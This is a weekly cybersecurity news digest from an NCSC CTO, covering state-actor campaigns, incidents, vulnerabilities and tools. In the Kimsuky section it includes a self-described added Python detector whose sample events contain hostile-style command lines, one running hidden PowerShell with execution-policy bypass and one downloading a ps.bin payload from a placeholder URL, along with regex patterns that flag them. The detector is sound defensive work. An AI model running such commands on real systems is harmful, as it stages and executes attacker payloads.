CTO at NCSC Summary: week ending February 11th
Edge security appliances continue to pose a threat to global cyber security...
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week, security device vulnerabilities, exploitation and cleanup all continue to consume focus, energy and resources across the globe.
In the high-level this week:
The Pall Mall Process: tackling the proliferation and irresponsible use of commercial cyber intrusion capabilities - Declaration after the event hosted by the UK and France in London this week.
QR Codes - what's the real risk? - from the team here at the UK’s National Cyber Security Centre to bring some pragmatic analysis to the situation.
EU capitals fear Russian retaliation and cyberattacks after asset freezes - “The EU diplomat cautioned that Russia might also escalate its cyberattacks against Western financial institutions in a bid to get its money back”
The U.S.’s FAR-Reaching New Cybersecurity Rules for Federal Contractors - “two notable items stand out: first, mandated vendor compliance with the Cybersecurity and Infrastructure Security Agency’s (CISA’s) Binding Operational Directives (BODs) and Emergency Directives (EDs) for non-cloud systems; and second, the expansion of required Federal Risk and Authorization Management Program (FedRAMP) compliance to cloud systems used by vendors on behalf of the federal government, not just those used by the government itself.”
UN Cybercrime Treaty Could Endanger Web Security - Royal Hansen gives their analysis of the risk here - “as we know well from helping stand up the Security Researcher Legal Defense Fund, individuals working to advance cybersecurity for the public good end up facing criminal charges. The Cybercrime Treaty should not criminalize the work of legitimate cybersecurity researchers and penetration testers, which is designed to protect individual systems and the web as a whole.”
Palo Alto Networks hit with $151.5 mln verdict in Centripetal patent trial - “The jury agreed with Centripetal that Palo Alto's security software infringed four patents related to Centripetal's "threat intelligence gateway" network-security technology.”
First EU-wide cybersecurity certification scheme to make European digital space safer - “The Commission has adopted the first-ever European cybersecurity certification scheme, in line with the EU Cybersecurity Act. The scheme offers a Union-wide set of rules and procedures on how to certify ICT products in their lifecycle and thus make them more trustworthy for users.”
Ransomware Payments Exceed $1 Billion in 2023, Hitting Record High After 2022 Decline - according to analysis by Chainalysis - “our initial reporting for 2022 in last year’s crime report showed $457 million in ransoms, but this figure has since been revised upward by 24.1%.”
Interlinked Computing in 2040: Safety, Truth, Ownership, and Accountability - “Computer systems are increasingly interconnected, magnifying benefits and risks, especially with AI integration. Using a Delphi-based method, we interviewed technology futurists about potential trends towards 2040 and their societal impacts. Our findings highlight five key forecasts related to artificial intelligence and system complexity, and suggest six interventions to mitigate negative impacts”
Treasury Sanctions Actors Responsible for Malicious Cyber Activities on Critical Infrastructure - “Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned six officials in the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC), an Iranian government organization responsible for a series of malicious cyber activities against critical infrastructure in the United States and other countries.”
Fingerprint photo led investigators to therapy centre hacking suspect in Finland - “A key clue came from a photo uploaded to the image sharing platform Ylilauta. The picture shows just a hand holding a bottle, but an examination of its fingerprints led investigators to realise it was Kivimäki's hand. The photo was found to have been uploaded from a server linked to the network police were investigating.”
Defending Democracy
Atlantic Council Report - Targeting Ukraine through Washington: Russian election interference, Ukraine, and the 2024 US election - “This issue brief describes Russia’s interest in Ukraine as it interfered in past US elections, why the current state of play might shape interference in the 2024 US elections, and what policymakers must watch. It makes three core recommendations: implement the legislative reforms to foreign espionage, agents, and lobbying disclosure laws recommended in the Senate’s bipartisan review of the 2016 election; watch the Putin regime’s war on Ukraine and identify any new cyber and information tactics; and intensify the practice of public intelligence disclosures concerning Russian covert influence activities and Russian cyber and information operations.”
Reporting on/from China
Shanghai-backed firm raises $933 mln to build satellite constellation - “Shanghai municipal government-backed Shanghai Spacecom Satellite Technology (SSST) has raised 6.7 billion yuan ($933 million) for the construction of a low-orbit satellite constellation, one of its investors said on Thursday. The series A capital raise was led by a fund set up by the National Manufacturing Transformation and Upgrading Fund (NMTUF), CAS Star said in a statement.”
Missing Boxes, an Email From China: How a Chip Shipment Sparked a U.S. Probe - “Autonomous-trucking company TuSimple facing several federal investigations, was preparing to exit from the American market for China when the CEO directed his staff to ship advanced semiconductors out of the U.S.”
Armies of bots battled on Twitter over Chinese spy balloon incident according to New Scientist - “Large proportions of users posting on Twitter – now X – about the Chinese balloon that drifted over the US and Canada in 2023 were bots attempting to shape the debate”
China's CXMT aims to build country's first advanced memory chips for AI - “ChangXin Memory Technologies (CXMT) is racing to produce China's first domestic high bandwidth memory, a critical component in artificial intelligence computing, as the country battles U.S. export controls and looks to reduce its reliance on foreign suppliers.”
Nvidia’s newly-tailored China chip to compete with rival Huawei product - “Nvidia has started to take pre-orders for its H20, a powerful graphics processing unit used in AI training. US trade sanctions prevent Nvidia from exporting to China its more advanced GPUs, such as the A100 and H100”
Tesla, Porsche chip in as Shanghai allays cross-border data flow ‘sore point’ - “While details of the categorisation criteria have not been released, Lu promised that the list of general data would be progressively expanded in a fashion similar to how China reduced the so-called negative list of the industries that banned foreign investors.”
Artificial intelligence
UK Defence Artificial Intelligence (AI) Playbook - Opening doors for industry to collaborate with Defence on AI development for the strategic advantage of our Armed Forces.
FCC Chairwoman: Make AI Voice-Generated Robocalls Illegal - “AI-generated voice cloning and images are already sowing confusion by tricking consumers into thinking scams and frauds are legitimate. No matter what celebrity or politician you favor, or what your relationship is with your kin when they call for help, it is possible we could all be a target of these faked calls,” said FCC Chairwoman Jessica Rosenworcel. “That’s why the FCC is taking steps to recognize this emerging technology as illegal under existing law, giving our partners at State Attorneys General offices across the country new tools they can use to crack down on these scams and protect consumers.”
U.S. Commerce Secretary Gina Raimondo Announces Key Executive Leadership at U.S. AI Safety Institute - “Elizabeth Kelly will lead the AI Safety Institute. I’m also thrilled that Elham Tabassi will expand her work at NIST and play a central role on our executive leadership team. Together, they will provide the direction and expertise we need to mitigate the risks that come with the development of this generation-defining technology, so that we can harness its potential,” said Secretary Raimondo. “Thanks to President Biden’s leadership, we’re in a position of power to meet the challenges posed by AI, while fostering America’s greatest strength: innovation.”
Grounded language acquisition through the eyes and ears of a single child - “Using longitudinal head-mounted camera recordings from one child aged 6 to 25 months, we trained a relatively generic neural network on 61 hours of correlated visual-linguistic data streams, learning feature-based representations and cross-modal associations. Our model acquires many word-referent mappings present in the child’s everyday experience, enables zero-shot generalization to new visual referents, and aligns its visual and linguistic conceptual systems. These results show how critical aspects of grounded word meaning are learnable through joint representation and associative learning from one child’s input.”
i-am-a-bot: An Multi-Modal LLM Powered Agent to automatically solve Captchas - Not high-level, but high-level people should be aware of it.
Cyber proliferation
Announcement of a Visa Restriction Policy to Promote Accountability for the Misuse of Commercial Spyware - United States Department of State
Buying Spying: How the commercial surveillance industry works and what can be done about it
Alleged Jordan and Pegasus usage
CPJ calls for an investigation into the targeting of journalists with Pegasus spyware in Jordan - Committee to Protect Journalists
Confirming Large-Scale Pegasus Surveillance of Jordan-based Civil Society - Citizen Lab
Bounty Hunting
Foreign Malicious Cyber Activity Against U.S. Critical Infrastructure - Rewards for Justice is offering a reward of up to $10 million for information leading to the identification or location of any person who, while acting at the direction or under the control of a foreign government against CNI
The reflections this week are around below-threshold technology, that is, technology (be it hardware, software or models) designed to fit under the bar set by export controls or other constraints. It is clear there is a degree of creativity being shown by vendors, and it puts into context the challenges around control of technology, especially when we consider horizontal scaling, multimodal models, fine tuning etc.
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Reporting on Russia
Analysis and Detection of STEADY#URSA Attack Campaign Targeting Ukraine Military Dropping New Covert SUBTLE-PAWS PowerShell Backdoor
D. Iuzvyk, T. Peck and O. Kolesnikov detail an alleged Russian campaign.
Throughout the entire attack campaign, most of the code executed by the malware was PowerShell. The exploitation chain is relatively simple: it involves the target executing a malicious shortcut (.lnk) file which loads and executes a new PowerShell backdoor payload code (found inside another file contained within the same archive). This custom Powershell backdoor is currently being tracked as “SUBTLE-PAWS” by the team.
Reporting on China
PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure
Our US partners, along with the UK and our Canadian, Australian and New Zealand partners, have collectively issued reporting on this threat.
The National Security Agency (NSA) has joined partners to issue a Cybersecurity Advisory (CSA) to address People’s Republic of China (PRC) targeting of U.S. critical infrastructure. The CSA, entitled “PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure,” is led by the Cybersecurity and Infrastructure Security Agency (CISA) in partnership with NSA, the Federal Bureau of Investigation (FBI), and additional government agencies.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
China cyber-attacks the Ministry of Foreign Affairs' system, causing a large-scale information leak including public cables according to Japanese news reports…
High-level Japanese news reporting here:
It has been revealed that the Ministry of Foreign Affairs' system for exchanging public cables containing confidential diplomatic information was attacked by a Chinese cyberattack, resulting in a large-scale information leak. The U.S. government issued a warning to the Japanese government in 2020 and requested a response, and the Japanese side has been inspecting the systems of major government agencies and hastening to strengthen countermeasures.
KV-Botnet: Don’t call it a Comeback
I spent some time with a commercial Threat Intelligence team this week where I challenged how we impose cost and know the impact of infrastructure disruption. As if by magic, this impact assessment came out from Lumen on the impact of the joint operation against Chinese covert infrastructure.
Black Lotus Labs has not been able to recover the malware samples associated with the x.sh cluster payload servers. And while the JDY, KV, and Fortinet clusters all shared some backend infrastructure, x.sh used a different set of infrastructure. Considering all factors, we assess with moderate confidence that x.sh is a separate activity cluster and distinct from the other three. ... We assess that KV-botnet has encountered significant resistance over the past several weeks. We believe that the main arm of the botnet, the KV cluster, has been rendered inert due to the action of U.S. law enforcement. We assess that the Fortinet activity had dissipated sometime in August of 2023. The JDY cluster has lost over half of its bots in the past month, but still remains operational. Finally, the signal associated with the x.sh cluster has been lost, likely due to public exposure.
https://blog.lumen.com/kv-botnet-dont-call-it-a-comeback/
MIVD Advisory Coathanger
The Netherlands Ministry of Defence details this alleged Chinese intrusion into its networks via a firewall.
The Ministry of Defence (MOD) of the Netherlands was impacted in 2023 by an intrusion into one of its networks. The effects were limited because of prior network segmentation. Incident response uncovered previously unpublished malware, a remote access trojan (RAT) designed specifically for Fortigate appliances. It is used as second-stage malware, and does not exploit a new vulnerability. Intelligence services MIVD & AIVD refer to the malware as COATHANGER based on a string present in the code.
The COATHANGER malware is stealthy and persistent. It hides itself by hooking system calls that could reveal its presence. It survives reboots and firmware upgrades.
MIVD & AIVD assess with high confidence that the malicious activity was conducted by a state-sponsored actor from the People’s Republic of China. This is part of a wider trend of Chinese political espionage against the Netherlands and its allies.
MIVD & AIVD assess that use of COATHANGER may be relatively targeted. The Chinese threat actor(s) scan for vulnerable edge devices at scale and gain access opportunistically, and likely introduce COATHANGER as a communication channel for select victims.
https://www.ncsc.nl/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear
https://github.com/JSCU-NL/COATHANGER
New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
A low-confidence alleged attribution, but more living-off-the-land activity and a new implant family.
[We] discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.”
We believe an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years.
Throughout the campaign, the adversary used living-off-the-land binaries (LoLBins) to deploy backdoors, establish command and control (C2), and maintain persistence.
At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be others.
Based on Talos’ and third-party research, the use of reverse proxy tools overlaps with TTPs employed by several threat groups originating from China. Still, we can assess the relations of the new threat actor with the existing groups only with low confidence, as open-source tools can be used by any threat actor. The choice of the compromised target does not align with the known objectives of any known threat actors originating from China.
https://blog.talosintelligence.com/new-zardoor-backdoor/
PAPERWALL: Chinese Websites Posing as Local News Outlets Target Global Audiences with Pro-Beijing Content
Alberto Fittarelli details an interesting alleged Chinese campaign as part of what appears to be a potential information operation.
A network of at least 123 websites operated from within the People’s Republic of China while posing as local news outlets in 30 countries across Europe, Asia, and Latin America, disseminates pro-Beijing disinformation and ad hominem attacks within much larger volumes of commercial press releases. We name this campaign PAPERWALL.
PAPERWALL has similarities with HaiEnergy, an influence operation first reported on in 2022 by the cybersecurity company Mandiant. However, we assess PAPERWALL to be a distinct campaign with different operators and unique techniques, tactics and procedures.
PAPERWALL draws significant portions of its content from Times Newswire, a newswire service that was previously linked to HaiEnergy. We found evidence that Times Newswire regularly seeds pro-Beijing political content, including ad hominem attacks, by concealing it within large amounts of seemingly benign commercial content.
A central feature of PAPERWALL, observed across the network of websites, is the ephemeral nature of its most aggressive components, whereby articles attacking Beijing’s critics are routinely removed from these websites some time after they are published.
We attribute the PAPERWALL campaign to Shenzhen Haimaiyunxiang Media Co., Ltd., aka Haimai, a PR firm in China based on digital infrastructure linkages between the firm’s official website and the network.
While the campaign’s websites enjoyed negligible exposure to date, there is a heightened risk of inadvertent amplification by the local media and target audiences, as a result of the quick multiplication of these websites and their adaptiveness to local languages and content.
Reporting on North Korea
Kimsuky disguised as a Korean company signed with a valid certificate to distribute Troll Stealer…
Jiho Kim & Sebin Lee detail what they suspect might be a North Korean stealer campaign. The use of a legitimate code signing certificate is of note.
The hunted malware is an Info-stealer malware written in Go language that steals information from the infected system, which is dropped and executed from a Dropper disguised as a security program installation file (TrustPKI, NX_PRNMAN) from SGA Solutions.
The dropper runs as a legitimate installer alongside the malware, and both the dropper and malware are signed with a valid, legitimate “D2innovation Co.,LTD” certificate, suggesting that the company’s certificate was actually stolen.
(Behaviors) Troll Stealer can steal information from the infected system like SSH, FileZilla, C drive files/directories, browser, system information, screen captures and send it to the C&C server.
(Attribution) Based on the Kimsuky group’s recent active use of Go-based malware, and the fact that Troll Stealer contains a lot of code similar to the AppleSeed and AlphaSeed malware associated with the Kimsuky group, we speculate that the Kimsuky group is behind the distribution of this malware.
Chinese reporting on the same campaign which might hint at a supply chain compromise.
[We] discovered a batch of secret-stealing attack samples disguised as product installation programs owned by the Korean software company SGA. After the samples are run, they release normal installation packages to confuse the victims, and secretly execute malicious DLLs processed by VMProtect. The malicious DLLs are implemented in Go; they collect various information on the infected device, send it back to the attacker, and then clear the traces of the attack.
Based on the digital signature carried by the stealer sample, we associated it with another malware used as a backdoor, also written in Go and with a VMProtect protective shell. This backdoor software has many overlapping features with historical attack samples of the Kimsuky organization, so we believe that both malware are related to the Kimsuky organization.
Kimsuky organization uses Dropbox cloud to conduct operational analysis
Chinese reporting on an alleged campaign here by North Korea using very basic Windows tradecraft for initial access, i.e. attachments via e-mail, and then using Dropbox to deliver the second stage.
In this incident, the attacker sent a malicious LNK file disguised as a PDF to the target to download the subsequent payload. The name of the file "트레이딩스파르타코스강의안-100불남(2차)" translates to "Trading Spartacus Lecture Notes -$100 (Second Issue)"; the suspected targets of the attack are people related to the digital currency/financial field.
The lnk command first downloads the second-stage payload "ps.bin" through dropbox and executes it.
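Both the SUBTLE-PAWS chain described under Russia above (a double-clicked .lnk launching a PowerShell payload staged from the same archive) and this Kimsuky lure (a .lnk posing as a PDF that pulls ps.bin from Dropbox) start with the user's shell spawning a script host with tell-tale arguments. The following is an added Python example, not code from this summary or from either vendor report, that runs a few such command-line heuristics over constructed process-creation events; the event shape, user names, paths and the Dropbox URL are made-up placeholders, and the heuristics are assumptions about what a defender might reasonably look for, not signatures from the reports.

```python
import json
import ntpath
import re
from typing import Dict, List

# Constructed process-creation events (not taken from the page or from the vendor
# reports it summarises). Field names loosely follow a Sysmon Event ID 1 / EDR
# process-creation record; user names, paths and the Dropbox URL are placeholders.
SAMPLE_EVENTS = [
    json.dumps({"id": 1, "parent": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\notepad.exe",
                "cmd": r'notepad.exe "C:\Users\alice\Documents\notes.txt"'}),
    json.dumps({"id": 2, "parent": r"C:\Windows\System32\cmd.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmd": "powershell.exe -Command Get-Service"}),
    # Shortcut double-clicked out of an extracted archive, the SUBTLE-PAWS shape.
    json.dumps({"id": 3, "parent": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmd": r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass '
                       r'-File "C:\Users\alice\AppData\Local\Temp\Rar$DIa1234\orders.ps1"'}),
    # Shortcut posing as a PDF that fetches a second stage from a cloud share.
    json.dumps({"id": 4, "parent": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\cmd.exe",
                "cmd": 'cmd.exe /c powershell -w hidden -c "iwr https://www.dropbox.com/s/EXAMPLE/ps.bin '
                       '-OutFile $env:TEMP\\ps.bin"'}),
    # Scheduled-task style launch: one weak signal, not enough on its own.
    json.dumps({"id": 5, "parent": r"C:\Windows\System32\svchost.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\backup\nightly.ps1"}),
]

# A user double-clicking a shortcut shows up as explorer.exe spawning the script host.
USER_SHELLS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line heuristics (assumed, not from the reports). Each is weak alone;
# the decision rule in analyse() combines them.
FLAGS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "exec_policy_bypass": re.compile(r"-e(xecutionpolicy)?\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "stage_from_archive_temp": re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\\", re.I),
    "cloud_share_download": re.compile(r"dropbox\.com|dropboxusercontent\.com", re.I),
}


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def score_event(event: Dict) -> List[str]:
    """Names of the heuristics the command line trips, in FLAGS order."""
    return [name for name, rx in FLAGS.items() if rx.search(event["cmd"])]


def is_user_script_launch(event: Dict) -> bool:
    """True when the user's shell (explorer.exe) spawned a script host directly."""
    return _name(event["parent"]) in USER_SHELLS and _name(event["image"]) in SCRIPT_HOSTS


def analyse(lines: List[str]) -> List[Dict]:
    """Run the heuristics over JSON event lines and return the events worth triage.

    Decision rule: a script host launched from the user's shell is reported if it
    trips any heuristic at all (the LNK-in-an-archive and LNK-as-PDF shapes);
    any other launch needs two or more. A lone -ExecutionPolicy Bypass under
    svchost.exe is typical of scheduled tasks and stays below the threshold.
    """
    findings = []
    for line in lines:
        ev = json.loads(line)
        hits = score_event(ev)
        user_launched = is_user_script_launch(ev)
        if (user_launched and hits) or len(hits) >= 2:
            findings.append({"id": ev["id"], "image": _name(ev["image"]),
                             "user_launched": user_launched, "flags": hits})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"event {f['id']}: {f['image']} flags={f['flags']} user_launched={f['user_launched']}")
```

Run as-is it reports events 3 and 4 only. The point of the two-tier rule is precision: the explorer.exe parent is what distinguishes a user opening a shortcut from an administrator's scheduled task using the same PowerShell switches, so the same weak signals can be used aggressively for the former without flooding the queue with the latter.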
BlueShell malware used to attack domestic Linux systems (2)
Alleged continued use of this Linux implant by a supposed North Korean actor. The fact that they continue implies they are likely being successful. So if you don’t have coverage of your Linux estate, this is the business case.
BlueShell malware created by the same attacker continues to be collected through VirusTotal. Although the host name of the Linux system is checked as a condition for checking the attack target, it is difficult to specify the attack target with that information alone, and related information such as the initial penetration method cannot be confirmed with the malicious code alone. However, as a new dropper malware disguised as an id command was confirmed and additional malware and C&C servers were confirmed, here we analyze and organize the additionally collected malware along with the BlueShell malware mentioned in the previous blog.
https://asec.ahnlab.com/ko/61293/
Reporting on Iran
Iran accelerates cyber ops against Israel from chaotic start
Clint Watts details what is alleged Iranian activity showing potential correlation with wider events and what responses in the future might look like. Doctrinal insights maybe?
Since Hamas attacked Israel in October 2023, Iranian government-aligned actors have launched a series of cyberattacks and influence operations (IO) intended to help the Hamas cause and weaken Israel and its political allies and business partners. Many of Iran’s immediate operations after October 7 were hasty and chaotic – indicating it had little or no coordination with Hamas – but it nevertheless has achieved growing success. Four findings stick out:
A 42% increase in traffic, in the first week of the war, to news sites run by or affiliated to the Iranian state. Even three weeks later, this traffic was still 28% above pre-war levels.
Despite early Iranian claims, many “attacks” in the early days of the war were either “leaking” old material, using pre-existing access to networks or were false.
Iran’s activity quickly grew from nine Microsoft-tracked groups active in Israel during the first week of the war to 14, two weeks into the war. Cyber-enabled influence operations went from roughly one operation every other month in 2021 to 11 in October 2023 alone.
As the war progressed, Iranian actors expanded their geographic scope to include attacks on Albania, Bahrain and the USA. They also increased their collaboration, enabling greater specialization and effectiveness.
https://blogs.microsoft.com/on-the-issues/2024/02/06/iran-accelerates-cyber-ops-against-israel/
Reporting on Other Actors
Smargaft Harnesses EtherHiding for Stealthy C2 Hosting
Alex.Turing and Acey9 outline some genuinely novel command and control here.
It uses the Binance Smart Chain to host its command and control (C2) server, and it spreads through Shell scripts to keep itself going like a virus. When looking closer, we noticed that some antivirus vendors flagged this botnet as Mirai, which isn't right. Because of its smart use of contracts and Gafgyt's methods, we've decided to call it Smargaft. It mainly does DDoS attacks, runs system commands, and lets users connect anonymously using a socks5 proxy.
https://blog.xlab.qianxin.com/smargaft_abusing_binance-smart-contracts_en/
Phishception - SendGrid is abused to host phishing attacks impersonating itself
When a Software-as-a-Service platform is used to attack itself; there are likely some lessons in here.
[We] recently observed that criminals abused SendGrid’s services to launch a phishing campaign impersonating SendGrid itself. The well-known provider, now owned by Twilio, makes sending emails at scale simple and flexible. In addition to scale, the promise of high deliverability and feature-rich tools make Sendgrid a sought-after service for legitimate businesses and a likely target for criminals.
The campaign observed uses a variety of complex lures, such as claiming the victim’s account has been suspended while its sending practices are reviewed or that the victim’s account is marked for removal due to a recent payment failure, combined with other SendGrid features to mask the actual destination of any malicious links.
https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
A backdoor with a cryptowallet stealer inside cracked macOS software
Sergey Puzan details a campaign riding on the back of pirated software. You wouldn’t steal a car!
A month ago, we discovered some cracked apps circulating on pirating websites and infected with a Trojan proxy. The malicious actors repackaged pre-cracked applications as PKG files with an embedded Trojan proxy and a post-install script initiating the infection. We recently caught sight of a new, hitherto unknown, macOS malware family that was piggybacking on cracked software. The threat proved far more potent than an unauthorized proxy server installation.
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/
Facebook Advertising Spreads Novel Malware Variant "Ov3r_Stealer"
More malvertising with a sophisticated lure but a rather clumsy technical chain.
[We] discovered a new malware named Ov3r_Stealer. At a high level, this malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors.
The initial attack vector for this malware at the time of discovery was through a Facebook job advertisement for an Account Manager position. Weaponized links brought the user to a malicious Discord content delivery URL, which in turn began the execution phase of the attack. In our victim’s environment, a Powershell script masquerading as a Windows Control Panel binary was executed that downloaded the malware from a GitHub site in the form of three files. During the investigation into the malware family, our SpiderLabs teams discovered other methods of loading the malware onto the system which included HTML Smuggling, SVG Smuggling, and LNK file masquerading.
https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/FaceBook_Ad_Spreads_Novel_Malware.pdf
Discovery
How we find and understand the latent compromises within our environments.
Identifying and Mitigating Living Off the Land Techniques
We all collaborated on this work product to provide practical advice on how to detect living off the land.
Microsoft Breach — What Happened? What Should Azure Admins Do?
Andy Robbins provides a useful guide on the underlying technical aspects of the tradecraft and how to practically detect it.
https://posts.specterops.io/microsoft-breach-what-happened-what-should-azure-admins-do-da2b7e674ebc
Lior Sonntag provides a similar guide with some detection queries (Andy’s is more detailed).
https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices
External domain activity report in Teams admin center
New feature which will be useful to cyber defence teams.
The report will surface the list of domains that your tenant has communicated with via managed communication, and how many internal users have been part of that communication.
Defence
How we proactively defend our environments.
Conditional Access architecture and personas
So we don’t all design it slightly wrong.
This article describes a Conditional Access architecture that adheres to Zero Trust principles. The architecture uses a persona-based approach to form a structured Conditional Access framework.
https://learn.microsoft.com/en-us/azure/architecture/guide/security/conditional-access-architecture
Incident Writeups & Disclosures
How they got in and what they did.
AnyDesk Incident Response 2-2-2024
Details on the who and how are still pending, but this happened.
We have revoked all security-related certificates and systems have been remediated or replaced where necessary. We will be revoking the previous code signing certificate for our binaries shortly and have already started replacing it with a new one.
Our systems are designed not to store private keys, security tokens or passwords that could be exploited to connect to end user devices. As a precaution, we are revoking all passwords to our web portal, my.anydesk.com, and we recommend that users change their passwords if the same credentials are used elsewhere.
https://anydesk.com/en/public-statement
https://anydesk.com/en/public-statement-2-2-2024
https://anydesk.com/en/faq-incident
Final update on November 2023 security incident involving unauthorized access at New Relic
Conclusions from the investigation here.
The unauthorized actor utilized a single New Relic employee account to gain access to New Relic’s Staging Environment.
All activity by the unauthorized actor within New Relic’s Staging Environment has been comprehensively identified and reviewed by New Relic and our industry-leading forensic firms.
Between October 24 and November 15, 2023, the unauthorized actor executed specific search queries and exfiltrated these query results from the Staging Environment.
The last observed unauthorized activity in the Staging Environment was on November 16, 2023. There is no indication of persistent access by the unauthorized actor in New Relic’s Staging Environment.
A very small percentage of our customers were impacted by the search queries executed by the unauthorized actor.
There is no indication of lateral movement from our Staging Environment to any customers’ New Relic accounts in the separate production environment or to New Relic’s production infrastructure.
Vulnerability
Our attack surface.
Critical Vulnerability in FortiOS
Upgrade or workaround.
The ASD’s ACSC is aware of an Unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2024-21762) in Fortinet FortiOS devices.
CVE-2024-21762 refers to an out-of-bounds write vulnerability that may allow Unauthenticated RCE via a specially crafted HTTP request.
Vendor note
Workaround: disable SSL VPN (disable webmode is NOT a valid workaround)
https://www.fortiguard.com/psirt/FG-IR-24-015
Remote user impersonation and takeover vulnerability in Mastodon
It will be interesting to see how fast and how comprehensively the fediverse patches here.
Due to a gap in validation of federated content in the affected Mastodon versions, attackers can craft payloads that impersonate remote federated accounts as-seen-from the affected server.
Every Mastodon version prior to 3.5.17 is vulnerable, as well as 4.0.x versions prior to 4.0.13, 4.1.x versions prior to 4.1.13, and 4.2.x versions prior to 4.2.5.
https://github.com/mastodon/mastodon/security/advisories/GHSA-3fjr-858r-92rw
Zyxel VPN Series Pre-auth Remote Command Execution
N-days inbound..
Chaining of three vulnerabilities allows unauthenticated attackers to execute arbitrary commands with root privileges on Zyxel VPN firewalls (VPN50, VPN100, VPN300, VPN500, VPN1000). Due to recent attack surface changes in Zyxel, the chain described below broke and became unusable – we have decided to disclose this even though it is no longer exploitable.
https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/
Supplemental Direction V1: ED 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities
CISA issued this, which meant that by last Friday all devices had to be pulled and restored to a good state before they could be reconnected.
Offense
Attack capability, techniques and trade-craft.
How We Were Able to Infiltrate Attacker Telegram Bots
Tzachi Zornstein does things which would not be possible in the UK as a private sector research firm.
Attackers often utilize Telegram bots to extract victims' data.
Monitoring an attacker's communication can provide valuable information.
It is possible to forward messages from an attacker's bot to your own Telegram account.
https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/
Exploitation
What is being exploited.
Raspberry Robin Keeps Riding the Wave of Endless 1-Days
Two new 1-day LPE exploits were used by the Raspberry Robin worm before they were publicly disclosed, which means that Raspberry Robin has access to an exploit seller or its authors develop the exploits themselves in a short period of time.
Raspberry Robin is continually updated with new features and evasions to be even stealthier than before.
Raspberry Robin slightly changed its communication method and lateral movement to avoid being caught by behavioral signatures implemented based on its previous version.
Raspberry Robin is spread with a new delivery method, disguised as a legitimate Windows component.
https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/
CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure
Exploit out..
CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA that allows an attacker to access certain restricted resources without authentication.
https://github.com/h4x0r-dz/CVE-2024-21893.py
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
TEx: Telegram Monitor
Given that Telegram is the Mos Eisley of the Internet, this tool from Guilherme Bacellar enables various intelligence flows.
TEx is a Telegram Explorer tool created to help Researchers, Investigators and Law Enforcement Agents to Collect and Process the Huge Amount of Data Generated from Criminal, Fraud, Security and Others Telegram Groups.
https://github.com/guibacellar/TEx
deluder: Deluder is a tool for intercepting traffic of proxy unaware applications
Michal Válka releases a tool which will have a variety of valuable analysis use cases.
Deluder is a tool for intercepting traffic of proxy unaware applications. It is based on Frida and uses dynamic instrumentation to intercept communication in common networking libraries on multiple platforms.
https://github.com/Warxim/deluder
Ivanti-ICT-Snapshot decryption
HiSe from Germany releases this valuable work aid.
In this script, only the decryption function has been retained. This makes it simple and less error-prone.
https://github.com/HiS3/Ivanti-ICT-Snapshot-decryption
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Github PoC Exploits Data Analysis "Prediction" for the year 2024 - we embark on a thorough exploration of time series analysis concerning GitHub's Exploit Proof of Concept (PoC) repositories. We scrutinize trends, seasonal fluctuations, and uncover a plethora of enlightening patterns ingrained in the dataset.
Location Tracking on The Battlefield - an attacker could use these interfaces to request the location (down to the GPS level), of a targeted mobile device
the target identity be known in advance
the capability and access to attack the mobile network is in place
the targeted networks’ signaling defences do not repel the attacks
FETTA Project Launched to Strengthen EU Cyber Threat Intelligence - "One of the key cybersecurity challenges in Europe is reducing reliance on threat intelligence from non-EU countries"
Artificial intelligence
Books
Nothing this week
Events
